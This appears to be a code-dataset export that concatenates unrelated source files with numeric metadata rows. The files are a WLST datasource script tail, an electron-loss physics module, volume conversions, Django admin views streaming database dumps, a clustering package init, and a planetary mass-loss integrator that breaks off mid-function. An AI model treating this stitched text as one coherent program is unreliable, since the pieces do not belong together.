cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDriverParams/ELNonJTADS/Properties/ELNonJTADS/Properties/databaseName')
cmo.setValue('ECLIPSELINK;create=true')

cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDriverParams/ELNonJTADS/Properties/ELNonJTADS')
cmo.createProperty('serverName')

cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDriverParams/ELNonJTADS/Properties/ELNonJTADS/Properties/serverName')
cmo.setValue('localhost')

cd('/JDBCSystemResources/ELNonJTADS/JDBCResource/ELNonJTADS/JDBCDataSourceParams/ELNonJTADS')
cmo.setGlobalTransactionsProtocol('None')

cd('/SystemResources/ELNonJTADS')
set('Targets',jarray.array([ObjectName('com.bea:Name=@TARGET_SERVER@,Type=Server')], ObjectName))

save()
activate()

#===========================================================================
# Exit WLST.
#===========================================================================
exit()
| 45.729323
| 147
| 0.722131
| 500
| 6,082
| 8.768
| 0.216
| 0.124544
| 0.100821
| 0.136405
| 0.863823
| 0.810447
| 0.759352
| 0.607208
| 0.607208
| 0.587135
| 0
| 0.003262
| 0.042256
| 6,082
| 132
| 148
| 46.075758
| 0.749356
| 0.174449
| 0
| 0.621622
| 0
| 0.027027
| 0.753659
| 0.682952
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0.027027
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
89165d789bd755afb216e90cf479a889adf2f3a9
| 7,565
|
py
|
Python
|
Calculate_power_absorbed_ellipse.py
|
mkraft89/To_eels_app
|
9e2fc6d501f51130b12164997f40cb7e0ec5a654
|
[
"Unlicense"
] | null | null | null |
Calculate_power_absorbed_ellipse.py
|
mkraft89/To_eels_app
|
9e2fc6d501f51130b12164997f40cb7e0ec5a654
|
[
"Unlicense"
] | null | null | null |
Calculate_power_absorbed_ellipse.py
|
mkraft89/To_eels_app
|
9e2fc6d501f51130b12164997f40cb7e0ec5a654
|
[
"Unlicense"
] | null | null | null |
import numpy as np
from scipy.special import iv as BesselI
gamma = 0.032                       # damping rate used by the (commented-out) Drude model below
n = np.arange(0,50,1)               # expansion orders used by all Pow_* functions
kmax = max(n) + 20                  # NOTE(review): unused in this module -- TODO confirm before removing
ep0 = 8.85e-12                      # vacuum permittivity [F/m]
epD = 1.0                           # NOTE(review): unused in this module -- presumably host permittivity
c = 3e8                             # speed of light [m/s] (some functions hard-code 3e8 instead)
Conv = 1.602e-19/6.626e-34*2*np.pi  # Conversion from eV to SI-units (angular frequency)
def Pow_abs(x_e, c_e, g, R0, R1, omega, epM):
    """Calculate the power absorbed in an annulus
    with a 'circling' electron as exciting source inside and
    an electron moving on a slightly curved trajectory outside (vertical).
    The trajectory of the electron derives from a straight vertical
    trajectory in the ellipse frame.
    Output: Resistive losses as a function of omega.

    Parameters (units assumed SI -- TODO confirm against caller):
      x_e, c_e : electron impact parameter and speed
      g        : geometry parameter of the ellipse (appears in the
                 Bessel-function argument) -- presumably the focal
                 distance; verify against ELS_ellipse_annulus.pdf
      R0, R1   : inner/outer boundary parameters of the annulus in
                 elliptic coordinates (assumption -- confirm)
      omega    : angular frequency
      epM      : (complex) dielectric function of the annulus material
                 at omega; only Im(epM) contributes to absorption

    Uses module-level globals `n` (expansion orders) and `ep0`.
    """
    # Disabled alternatives kept from development:
    # epM = 1-64/(omega*(omega+1j*gamma))   # Drude-type dielectric function
    # omega = omega*Conv                    # eV -> SI angular frequency
    a_n_s = np.zeros(np.size(n), dtype='complex128')
    ### Lambda = 4*pi*eps0 in expression for source coefficients
    ### Calculate lambda according to formula in ELS_slab_crescent.pdf
    # Source coefficients of the exciting electron, one per order.
    for k_n in range(0,np.size(n)):
        a_n_s[k_n] = np.exp(-omega/c_e*x_e)/omega*BesselI(k_n,omega*g/c_e)
    # Calculate expansion coefficients as in ELS_ellipse_annulus.pdf
    # This is for the cosine terms
    c_n_c_m = -2*a_n_s/((epM-1)**2 * R0**(2*n) - (epM+1)**2 * R1**(2*n))\
        * ((epM-1)*(R0*R1)**(2*n) + (epM+1)*R1**(2*n))
    c_n_c_p = -2*a_n_s/((epM-1)**2 * R0**(2*n) - (epM+1)**2 * R1**(2*n))\
        * ((epM-1) + (epM+1)*R1**(2*n))
    # This is for the sin terms
    c_n_s_m = -2*a_n_s/((epM-1)**2 * R0**(2*n) - (epM+1)**2 * R1**(2*n))\
        * ((epM-1)*(R0*R1)**(2*n) - (epM+1)*R1**(2*n))
    c_n_s_p = -2*a_n_s/((epM-1)**2 * R0**(2*n) - (epM+1)**2 * R1**(2*n))\
        * (-(epM-1) + (epM+1)*R1**(2*n))
    # Order-summed, |coefficient|^2-weighted radial factors.
    Term1 = sum(n**2/(2*n-1) * (pow(abs(c_n_s_p),2)+pow(abs(c_n_c_p),2) )\
        * (R1**(2*n)-R0**(2*n)))
    Term2 = sum(n**2/(2*n+1) * (pow(abs(c_n_s_m),2)+pow(abs(c_n_c_m),2) )\
        * (R1**(-2*n)-R0**(-2*n)))
    # Resistive (Ohmic) loss ~ omega * Im(epM).
    return np.pi * ep0/2 * omega * np.imag(epM) * (Term1-Term2)
def Pow_abs_r(x_e, c_e, g, R0, R1, omega, epM):
    """Calculate the power absorbed in an annulus
    with a 'circling' electron as exciting source inside and
    an electron moving on a slightly curved trajectory outside (vertical).
    The trajectory of the electron derives from a straight vertical
    trajectory in the ellipse frame.
    Output: Resistive losses as a function of omega.

    Variant of Pow_abs that additionally includes a radiative-reaction
    correction: the n=1 (dipole) expansion coefficients are replaced by
    corrected expressions built from C0 and C below.

    Same parameters and module-global usage as Pow_abs.
    """
    # Disabled alternatives kept from development:
    # epM = 1-64/(omega*(omega+1j*gamma))
    # omega = omega*Conv
    # NOTE(review): hard-codes the speed of light as 3e8 instead of the
    # module constant `c` -- consider unifying.
    k0 = omega/3e8
    a_n_s = np.zeros(np.size(n), dtype='complex128')
    ### Lambda = 4*pi*eps0 in expression for source coefficients
    ### Calculate lambda according to formula in ELS_slab_crescent.pdf
    # Source coefficients of the exciting electron, one per order.
    for k_n in range(0,np.size(n)):
        a_n_s[k_n] = np.exp(-omega/c_e*x_e)/omega*BesselI(k_n,omega*g/c_e)
    # Calculate expansion coefficients as in ELS_ellipse_annulus.pdf
    # This is for the cosine terms
    c_n_c_m = -2*a_n_s/((epM-1)**2 * R0**(2*n) - (epM+1)**2 * R1**(2*n))\
        * ((epM-1)*(R0*R1)**(2*n) + (epM+1)*R1**(2*n))
    c_n_c_p = -2*a_n_s/((epM-1)**2 * R0**(2*n) - (epM+1)**2 * R1**(2*n))\
        * ((epM-1) + (epM+1)*R1**(2*n))
    # This is for the sin terms
    c_n_s_m = -2*a_n_s/((epM-1)**2 * R0**(2*n) - (epM+1)**2 * R1**(2*n))\
        * ((epM-1)*(R0*R1)**(2*n) - (epM+1)*R1**(2*n))
    c_n_s_p = -2*a_n_s/((epM-1)**2 * R0**(2*n) - (epM+1)**2 * R1**(2*n))\
        * (-(epM-1) + (epM+1)*R1**(2*n))
    # Radiative reaction
    # Denominator C (C0 is the radiative-reaction term; setting k0 = 0
    # would recover the quasistatic result).
    # k0 = 0
    C0 = +1j*np.pi*g**2*k0**2/16.  # /R0**2
    C = R0**2 * R1**(-2) * (-(epM-1)**2 * (R0/R1)**2 + (epM+1)**2)\
        + C0 * ((epM**2-1) * ((R0/R1)**2-1) * (R0**2 + R1**(-2)))\
        + 1*C0**2 * ((epM+1)**2*(R0/R1)**2 - (epM-1)**2)
    # Changed dipole terms: overwrite only the n=1 coefficients with the
    # radiation-corrected expressions.
    c_n_c_m[1] = 2 * a_n_s[1] * R0**2 / C\
        *( (C0*(1-epM) + (1+epM)*R1**(-2))\
        - R1**(-2)*(C0*(1+epM) + R0**2*(1-epM)))
    c_n_c_p[1] = 2 * a_n_s[1] * R1**(-2) / C\
        *( ((epM-1)*R0**2*R1**(-2) - C0*(epM+1)*R0**2)\
        + ((epM+1)*R0**2 - (epM-1)*C0))
    c_n_s_m[1] = 2 * a_n_s[1] * R0**2 / C\
        *( -(C0*(1-epM) + (1+epM)*R1**(-2))\
        - R1**(-2)*(C0*(1+epM) + R0**2*(1-epM)))
    c_n_s_p[1] = 2 * a_n_s[1] * R1**(-2) / C\
        *( -((epM-1)*R0**2*R1**(-2) - C0*(epM+1)*R0**2)\
        + ((epM+1)*R0**2 - (epM-1)*C0))
    # Order-summed, |coefficient|^2-weighted radial factors.
    Term1 = sum(n**2/(2*n-1) * (pow(abs(c_n_s_p),2)+pow(abs(c_n_c_p),2) )\
        * (R1**(2*n)-R0**(2*n)))
    Term2 = sum(n**2/(2*n+1) * (pow(abs(c_n_s_m),2)+pow(abs(c_n_c_m),2) )\
        * (R1**(-2*n)-R0**(-2*n)))
    # Resistive (Ohmic) loss ~ omega * Im(epM).
    return np.pi * ep0/2 * omega * np.imag(epM) * (Term1-Term2)
def Pow_sca_r(x_e, c_e, g, R0, R1, omega, epM):
    """Calculate the power scattered by an annulus
    with a 'circling' electron as exciting source inside and
    an electron moving on a slightly curved trajectory outside (vertical).
    The trajectory of the electron derives from a straight vertical
    trajectory in the ellipse frame.
    Output: Scattered power as a function of omega.

    Dipole-only (n=1) scattered power including the radiative-reaction
    correction (same C0/C construction as Pow_abs_r).

    Same parameters as Pow_abs; uses module globals `ep0` and `c`.
    """
    # Disabled alternatives kept from development:
    # epM = 1-64/(omega*(omega+1j*gamma))
    # omega = omega*Conv
    k0 = omega/c
    # Radiative damping prefactor for the dipole channel (assumption --
    # confirm against the derivation PDF).
    gamma_abs = 1j* np.pi**2 * ep0 * g**2/8.0 * k0**2
    k_n = 1  # NOTE(review): unused -- only order n=1 is evaluated below
    ### Lambda = 4*pi*eps0 in expression for source coefficients
    ### Calculate lambda according to formula in ELS_slab_crescent.pdf
    # n=1 source coefficient of the exciting electron.
    a_n_s = np.exp(-omega/c_e*x_e)/omega*BesselI(1,omega*g/c_e)
    # Radiative reaction
    # Denominator C (C0 -> 0 recovers the quasistatic limit).
    C0 = +1j*np.pi*g**2*k0**2/16.  # /R0**2
    C = R0**2 * R1**(-2) * (-(epM-1)**2 * (R0/R1)**2 + (epM+1)**2)\
        + C0 * ((epM**2-1) * ((R0/R1)**2-1) * (R0**2 + R1**(-2)))\
        + 1*C0**2 * ((epM+1)**2*(R0/R1)**2 - (epM-1)**2)
    # Calculate expansion coefficients as in ELS_ellipse_annulus.pdf
    # This is for the cosine terms (the trailing "- 1*a_n_s" subtracts the
    # bare source term -- presumably leaving only the induced field; confirm)
    b_c = -(a_n_s/C*( (C0*(epM+1)**2*(R0/R1)**2 - C0*(epM-1)**2\
        - (epM**2-1) * ((R0/R1)**2-1)/R1**2)\
        - 4*epM*(R0/R1)**2))\
        - 1*a_n_s
    # This is for the sin terms
    b_s = -(a_n_s/C*( -(C0*(epM+1)**2*(R0/R1)**2 - C0*(epM-1)**2\
        - (epM**2-1) * ((R0/R1)**2-1)/R1**2)\
        - 4*epM*(R0/R1)**2))\
        - 1*a_n_s
    return omega/2 * np.imag(gamma_abs * (abs(b_c)**2 + abs(b_s)**2))
def Pow_sca(x_e, c_e, g, R0, R1, omega, epM):
    """Calculate the power scattered by an annulus
    with a 'circling' electron as exciting source inside and
    an electron moving on a slightly curved trajectory outside (vertical).
    The trajectory of the electron derives from a straight vertical
    trajectory in the ellipse frame.
    Output: Scattered power as a function of omega.

    Quasistatic counterpart of Pow_sca_r: dipole-only (n=1) scattered
    power without the radiative-reaction denominator.

    Same parameters as Pow_abs; uses module global `ep0`.
    """
    # Disabled alternatives kept from development:
    # epM = 1-64/(omega*(omega+1j*gamma))
    # omega = omega*Conv
    # NOTE(review): hard-codes 3e8 instead of the module constant `c`.
    k0 = omega/3e8
    # Radiative damping prefactor for the dipole channel (assumption --
    # confirm against the derivation PDF).
    gamma_abs = 1j* np.pi**2 * ep0 * g**2/8 * k0**2
    k_n = 1  # NOTE(review): unused -- only order n=1 is evaluated below
    ### Lambda = 4*pi*eps0 in expression for source coefficients
    ### Calculate lambda according to formula in ELS_slab_crescent.pdf
    # n=1 source coefficient of the exciting electron.
    a_n_s = np.exp(-omega/c_e*x_e)/omega*BesselI(1,omega*g/c_e)
    # Calculate expansion coefficients as in ELS_ellipse_annulus.pdf
    # This is for the cosine terms (the trailing "- 1*a_n_s" subtracts the
    # bare source term -- presumably leaving only the induced field; confirm)
    b_c = (a_n_s /((epM-1)**2 * R0**(2) - (epM+1)**2 * R1**(2))\
        *( (epM**2-1) * (R1**(2)-R0**(2))\
        - 4*epM * R1**(2) * R0**(2) ) * R0**(-2)) - 1*a_n_s
    # This is for the sin terms
    b_s = (a_n_s/((epM-1)**2 * R0**(2) - (epM+1)**2 * R1**(2))\
        *( -(epM**2-1) * (R1**(2)-R0**(2))\
        - 4*epM * R1**(2) * R0**(2) ) * R0**(-2)) - 1*a_n_s
    return omega/2 * np.imag(gamma_abs * (abs(b_c)**2 + abs(b_s)**2))
if __name__ == "__main__":
    # Fixed: the Python 2-only `print '...'` statement made this module a
    # SyntaxError (hence unimportable) under Python 3; print(...) behaves
    # identically on both interpreters.
    print('Supposed to be called as a function, not main module')
| 35.350467
| 74
| 0.538929
| 1,422
| 7,565
| 2.7391
| 0.096343
| 0.063671
| 0.041078
| 0.030809
| 0.920924
| 0.91887
| 0.91887
| 0.91887
| 0.91887
| 0.91887
| 0
| 0.089264
| 0.240317
| 7,565
| 213
| 75
| 35.516432
| 0.588481
| 0.168936
| 0
| 0.652174
| 0
| 0
| 0.016434
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.021739
| null | null | 0.01087
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8f166d2f1c26bbbe7c2f062c5a27fc960f62b1bb
| 1,104
|
py
|
Python
|
units/volume/kilolitres.py
|
putridparrot/PyUnits
|
4f1095c6fc0bee6ba936921c391913dbefd9307c
|
[
"MIT"
] | null | null | null |
units/volume/kilolitres.py
|
putridparrot/PyUnits
|
4f1095c6fc0bee6ba936921c391913dbefd9307c
|
[
"MIT"
] | null | null | null |
units/volume/kilolitres.py
|
putridparrot/PyUnits
|
4f1095c6fc0bee6ba936921c391913dbefd9307c
|
[
"MIT"
] | null | null | null |
# <auto-generated>
# This code was generated by the UnitCodeGenerator tool
#
# Changes to this file will be lost if the code is regenerated
# </auto-generated>
def to_millilitres(value):
    """Convert a volume in kilolitres to millilitres."""
    MILLILITRES_PER_KILOLITRE = 1000000.0
    return value * MILLILITRES_PER_KILOLITRE
def to_litres(value):
    """Convert a volume in kilolitres to litres."""
    LITRES_PER_KILOLITRE = 1000.0
    return value * LITRES_PER_KILOLITRE
def to_teaspoons(value):
    """Convert a volume in kilolitres to (imperial) teaspoons."""
    KILOLITRES_PER_TEASPOON = 0.000005919390467447916
    return value / KILOLITRES_PER_TEASPOON
def to_tablespoons(value):
    """Convert a volume in kilolitres to (imperial) tablespoons."""
    KILOLITRES_PER_TABLESPOON = 0.000017758171402343747
    return value / KILOLITRES_PER_TABLESPOON
def to_quarts(value):
    """Convert a volume in kilolitres to (imperial) quarts."""
    KILOLITRES_PER_QUART = 0.00113652296975
    return value / KILOLITRES_PER_QUART
def to_pints(value):
    """Convert a volume in kilolitres to (imperial) pints."""
    KILOLITRES_PER_PINT = 0.000568261484874999889
    return value / KILOLITRES_PER_PINT
def to_gallons(value):
    """Convert a volume in kilolitres to (imperial) gallons."""
    KILOLITRES_PER_GALLON = 0.0045460918799
    return value / KILOLITRES_PER_GALLON
def to_fluid_ounces(value):
    """Convert a volume in kilolitres to (imperial) fluid ounces."""
    KILOLITRES_PER_FLUID_OUNCE = 0.0000284130742437499946
    return value / KILOLITRES_PER_FLUID_OUNCE
def to_u_s_teaspoons(value):
    """Convert a volume in kilolitres to US teaspoons."""
    KILOLITRES_PER_US_TEASPOON = 0.000004928921593749999
    return value / KILOLITRES_PER_US_TEASPOON
def to_u_s_tablespoons(value):
    """Convert a volume in kilolitres to US tablespoons."""
    KILOLITRES_PER_US_TABLESPOON = 0.000014786764781249998
    return value / KILOLITRES_PER_US_TABLESPOON
def to_u_s_quarts(value):
    """Convert a volume in kilolitres to US quarts."""
    KILOLITRES_PER_US_QUART = 0.000946352945999999959
    return value / KILOLITRES_PER_US_QUART
def to_u_s_pints(value):
    """Convert a volume in kilolitres to US pints."""
    KILOLITRES_PER_US_PINT = 0.000473176472999999979
    return value / KILOLITRES_PER_US_PINT
def to_u_s_gallons(value):
    """Convert a volume in kilolitres to US gallons."""
    KILOLITRES_PER_US_GALLON = 0.003785411784
    return value / KILOLITRES_PER_US_GALLON
def to_u_s_fluid_ounces(value):
    """Convert a volume in kilolitres to US fluid ounces."""
    KILOLITRES_PER_US_FLUID_OUNCE = 0.0000295735296
    return value / KILOLITRES_PER_US_FLUID_OUNCE
def to_u_s_cups(value):
    """Convert a volume in kilolitres to US cups."""
    KILOLITRES_PER_US_CUP = 0.000236588236499999989
    return value / KILOLITRES_PER_US_CUP
| 29.052632
| 62
| 0.786232
| 160
| 1,104
| 5.23125
| 0.30625
| 0.089606
| 0.286738
| 0.264038
| 0.360812
| 0.066906
| 0
| 0
| 0
| 0
| 0
| 0.280628
| 0.134964
| 1,104
| 37
| 63
| 29.837838
| 0.595812
| 0.134964
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
8f3ba647650e44d380b1e43ba2cd214ef20ee471
| 2,020
|
py
|
Python
|
dbbackup/views.py
|
zyayoung/lab-item-tracking
|
6d0ee000114300d6693ec078f974b9a6ef4dfe40
|
[
"MIT"
] | 4
|
2019-01-14T15:44:22.000Z
|
2019-01-16T16:07:19.000Z
|
dbbackup/views.py
|
zyayoung/lab-item-tracking
|
6d0ee000114300d6693ec078f974b9a6ef4dfe40
|
[
"MIT"
] | 2
|
2019-02-01T00:50:20.000Z
|
2019-02-22T15:15:54.000Z
|
dbbackup/views.py
|
zyayoung/lab-item-tracking
|
6d0ee000114300d6693ec078f974b9a6ef4dfe40
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.http import StreamingHttpResponse
import subprocess
from login.utils import check_admin
def _dumpdata_response(app_label, file_name, chunk_size=512):
    """Stream the output of ``manage.py dumpdata <app_label>`` as a download.

    Fixes two issues with the original three copy-pasted views: the
    identical streaming logic was duplicated verbatim in each view, and
    the inner generator took a ``file_name`` argument it never used.

    :param app_label: Django app whose data is dumped (passed to dumpdata).
    :param file_name: download filename advertised to the browser.
    :param chunk_size: bytes read from the subprocess per chunk.
    :return: StreamingHttpResponse serving the JSON dump as an attachment.
    """
    def _iter_chunks():
        # Stream the subprocess output in fixed-size chunks so large
        # dumps never need to fit in memory at once; the `with` block
        # ensures the process handle is cleaned up when the stream ends.
        with subprocess.Popen(['python', 'manage.py', 'dumpdata', app_label],
                              stdout=subprocess.PIPE) as proc:
            while True:
                chunk = proc.stdout.read(chunk_size)
                if not chunk:
                    break
                yield chunk

    response = StreamingHttpResponse(_iter_chunks())
    response['Content-Type'] = 'application/octet-stream'
    response['Content-Disposition'] = 'attachment;filename="{0}"'.format(file_name)
    return response


@check_admin
def users(request):
    """Download the `login` app's fixture data as login.json (admin only)."""
    return _dumpdata_response('login', 'login.json')


@check_admin
def inventory(request):
    """Download the `inventory` app's fixture data as inventory.json (admin only)."""
    return _dumpdata_response('inventory', 'inventory.json')


@check_admin
def log(request):
    """Download the `log` app's fixture data as log.json (admin only)."""
    return _dumpdata_response('log', 'log.json')
| 34.237288
| 109
| 0.623267
| 228
| 2,020
| 5.359649
| 0.241228
| 0.07856
| 0.081015
| 0.05401
| 0.851064
| 0.851064
| 0.851064
| 0.851064
| 0.851064
| 0.851064
| 0
| 0.008086
| 0.265347
| 2,020
| 58
| 110
| 34.827586
| 0.815364
| 0
| 0
| 0.734694
| 0
| 0
| 0.177228
| 0.072772
| 0
| 0
| 0
| 0
| 0
| 1
| 0.122449
| false
| 0
| 0.081633
| 0
| 0.265306
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71343eb77c2d7294243704ddcde710c1d5f15a45
| 826
|
py
|
Python
|
cluster/utils/__init__.py
|
jzenn/cluster
|
500761d4db5104b9247b13de7293a9157f10986b
|
[
"MIT"
] | 1
|
2021-04-14T14:17:14.000Z
|
2021-04-14T14:17:14.000Z
|
cluster/utils/__init__.py
|
jzenn/cluster
|
500761d4db5104b9247b13de7293a9157f10986b
|
[
"MIT"
] | null | null | null |
cluster/utils/__init__.py
|
jzenn/cluster
|
500761d4db5104b9247b13de7293a9157f10986b
|
[
"MIT"
] | null | null | null |
from .visualization import visualize_clusters_2d, visualize_graph_2d
from .graph import (
eps_graph_from_similarity_matrix,
fc_graph_from_similarity_matrix,
kNN_graph_from_similarity_matrix,
mkNN_graph_from_similarity_matrix,
)
from .similarity import (
get_similarity_matrix,
get_random_similarity_matrix,
get_distance_matrix_from_similarity_matrix,
get_similarity_matrix_from_distance_matrix,
)
__all__ = [
"get_similarity_matrix",
"get_random_similarity_matrix",
"get_distance_matrix_from_similarity_matrix",
"get_similarity_matrix_from_distance_matrix",
"eps_graph_from_similarity_matrix",
"fc_graph_from_similarity_matrix",
"kNN_graph_from_similarity_matrix",
"mkNN_graph_from_similarity_matrix",
"visualize_clusters_2d",
"visualize_graph_2d",
]
| 28.482759
| 68
| 0.805085
| 100
| 826
| 5.91
| 0.17
| 0.433164
| 0.338409
| 0.338409
| 0.896785
| 0.896785
| 0.778342
| 0.778342
| 0.778342
| 0.778342
| 0
| 0.005602
| 0.135593
| 826
| 28
| 69
| 29.5
| 0.822129
| 0
| 0
| 0
| 0
| 0
| 0.363196
| 0.341404
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.12
| 0
| 0.12
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
85603fa2484aafa9f70f7b959a6fd5313c57fc61
| 48,388
|
py
|
Python
|
platypos/mass_evolution_function.py
|
soumitrahazra/platypos
|
f4042f42a1727ff40e7c713656ef8760ba943a03
|
[
"MIT"
] | 10
|
2020-05-11T16:12:04.000Z
|
2022-02-27T00:47:19.000Z
|
platypos/mass_evolution_function.py
|
lketzer/platypos
|
f4042f42a1727ff40e7c713656ef8760ba943a03
|
[
"MIT"
] | null | null | null |
platypos/mass_evolution_function.py
|
lketzer/platypos
|
f4042f42a1727ff40e7c713656ef8760ba943a03
|
[
"MIT"
] | 1
|
2021-11-29T23:39:59.000Z
|
2021-11-29T23:39:59.000Z
|
import numpy as np
import math
import astropy.units as u
from astropy import constants as const
from platypos.lx_evo_and_flux import lx_evo, l_xuv_all
from platypos.lx_evo_and_flux import flux_at_planet_earth, flux_at_planet
import platypos.planet_models_LoFo14 as plmoLoFo14
import platypos.planet_model_Ot20 as plmoOt20
import platypos.beta_K_functions as bk
from platypos.mass_loss_rate_function import mass_loss_rate_forward_LO14
from platypos.mass_loss_rate_function import mass_loss_rate_forward_Ot20
def mass_planet_RK4_forward_LO14(epsilon, K_on, beta_on, planet_object,
                                 initial_step_size, t_final, track_dict):
    """USED: 4th order Runge-Kutta as numerical integration method.

    Integrate from the current time (t_start, where the planet has R0 and
    M0) into the future, taking into account photoevaporative mass loss.
    The step size is adaptive.

    Parameters:
    -----------
    epsilon (float): evaporation efficiency
    K_on (str): set use of K parameter on or off ("yes" or "no")
    beta_on (str): set use of beta parameter on or off ("yes" or "no")
    planet_object: object of planet class which contains also stellar
                   parameters and info about stellar evo track
    initial_step_size (float): initial step size; varied during the run
    t_final (float): final time of simulation
    track_dict (dict): dictionary with Lx evolutionary track parameters

    [NOTE: the implementation of a variable step size is somewhat
    preliminary. The step size is adjusted (made smaller or bigger
    depending on how fast or slow the mass/radius changes) until the final
    time step is greater than t_final. This means that if the step size in
    the end is e.g. 10 Myr, and the integration is at 4999 Myr, then the
    last time entry will be 4999+10 -> 5009 Myr.]

    Returns:
    --------
    t_arr (array): time array to trace mass and radius evolution
    M_arr (array): mass array with mass evolution over time (mass decrease)
    R_arr (array): radius array with radius evolution over time (from
                   thermal contraction and photoevaporative mass-loss)
    Lx_arr (array): array to trace the X-ray luminosity (mainly for
                    consistency checks)

    Raises:
    -------
    RuntimeError: if the post-step sanity check (planet mass still above
                  core mass) fails; this should never happen.
    """
    # define some constants
    M_EARTH = const.M_earth.cgs.value
    Myr_to_sec = 1e6*365*86400
    # initialize the starting values for the X-ray luminosity at t_start,
    # the starting planet parameters, as well as beta & K (at t_start);
    # convert X-ray to XUV lum. and calculate planet's high energy
    # incident flux
    Lx0 = lx_evo(t=track_dict["t_start"], track_dict=track_dict)
    Lxuv0 = l_xuv_all(Lx0)
    Fxuv0 = flux_at_planet(Lxuv0, planet_object.distance)
    f_env_0 = f_env = planet_object.fenv
    R0 = R = planet_object.radius
    M0 = M = planet_object.mass
    rho0 = rho = plmoLoFo14.density_planet(M0, R0)
    M_env0 = M_env = M0 - planet_object.core_mass
    M_core = planet_object.core_mass
    R_core = planet_object.core_radius

    # CRITERION for when the planet has lost all atmosphere:
    # for the LoFo14 planets the core mass and thus the core radius is
    # fixed. So when the planet mass gets smaller than or equal to the
    # core mass, we assume only the bare rocky core is left.

    # beta0 and K0 are informational only here; the mass-loss-rate
    # function evaluates beta and K itself at each substep
    if beta_on == "yes":
        beta = beta0 = bk.beta_fct(M0, Fxuv0, R0)
    elif beta_on == "no":
        beta = beta0 = 1.
    if K_on == "yes":
        K = K0 = bk.K_fct(planet_object.distance, M0,
                          planet_object.mass_star, R0)
    elif K_on == "no":
        K = K0 = 1.

    # since the step size is adaptive, use lists to keep track of
    # the time, mass, radius and Lx evolution
    M_arr = [M0]
    R_arr = [R0]
    t0 = t = track_dict["t_start"]
    t_arr = [t0]
    Lx_arr = [Lx0]

    dt = initial_step_size
    # NOTE: minimum and maximum step size are HARDCODED for now (see
    # further down in code for more details)
    min_step_size, max_step_size = 1e-2, 10.

    i = 1  # counter: how many traced RK iterations have been performed
    j = 1  # counter: how many RK iterations have been attempted
    envelope_left = True  # flag: False once the envelope is gone
    close_to_evaporation = False  # flag: planet is close to complete
                                  # atmospheric removal
    # keep all attempted step sizes, even those which resulted in too
    # drastic radius changes -> used to detect the code oscillating in an
    # infinite loop between make_bigger, make_smaller, make_bigger, etc.
    step_size_list = []

    while t <= t_final:
        # This step (Lx(t) calculation) is just for tracing Lx and
        # checking if it is correct. It is NOT required since the Lx(t)
        # calculation is embedded in the mass-loss-rate function.
        Lx_i = lx_evo(t=t, track_dict=track_dict)

        # IMPORTANT points on the time step:
        # When the initial time step is too large OR the planet mass
        # becomes very close to the core mass (after several time steps),
        # one of the RK substeps can lose so much mass that the new planet
        # mass is smaller than the core mass.
        # Two cases are distinguished:
        # 1) the initial time step is too large, so M_lost = nan after the
        # first iteration (i.e. an RK substep mass < core mass)
        # -> immediately switch to the lowest possible step size and let
        # the code run from there (the step size can grow again later)
        # 2) at the end of planet evolution, when the planet mass gets
        # very close to the core mass, the mass lost eventually exceeds
        # the remaining atmosphere mass (either at the end of a complete
        # RK iteration, or already in one of the RK substeps, in which
        # case the mass lost after the complete RK step evaluates to nan
        # and no new planet radius can be calculated). In both cases the
        # planet is assumed to be fully evaporated at t_i + dt.

        # record the current step size, then check the last 20 attempts
        # for a constant back-and-forth between two step sizes,
        # e.g. [0.1, 1.0, 0.1, 1.0, ...]: differences all equal, values
        # not all the same, and the even/odd positions each constant
        step_size_list.append(dt)
        step_size_array = np.array(step_size_list)
        step_size_difference = abs(np.diff(step_size_array[-20:]))
        if len(step_size_array) >= 20:  # check only after 20 iterations
            if (np.all(step_size_difference == step_size_difference[0]) and
                    not np.all(step_size_array == step_size_array[0]) and
                    np.all(step_size_array[::2] == step_size_array[0]) and
                    np.all(step_size_array[1::2] == step_size_array[1])):
                print("no convergence, set min. step size.")
                # no convergence -> switch to minimum step size
                dt = min_step_size
        # else, all is good, continue with current step size

        while envelope_left:
            # go through RK iterations as long as there is envelope left;
            # apply Runge-Kutta 4th order to find the next value of M_dot
            # NOTE: the mass lost in one timestep is in Earth masses
            Mdot1 = mass_loss_rate_forward_LO14(t, epsilon, K_on,
                                                beta_on, planet_object,
                                                f_env, track_dict)
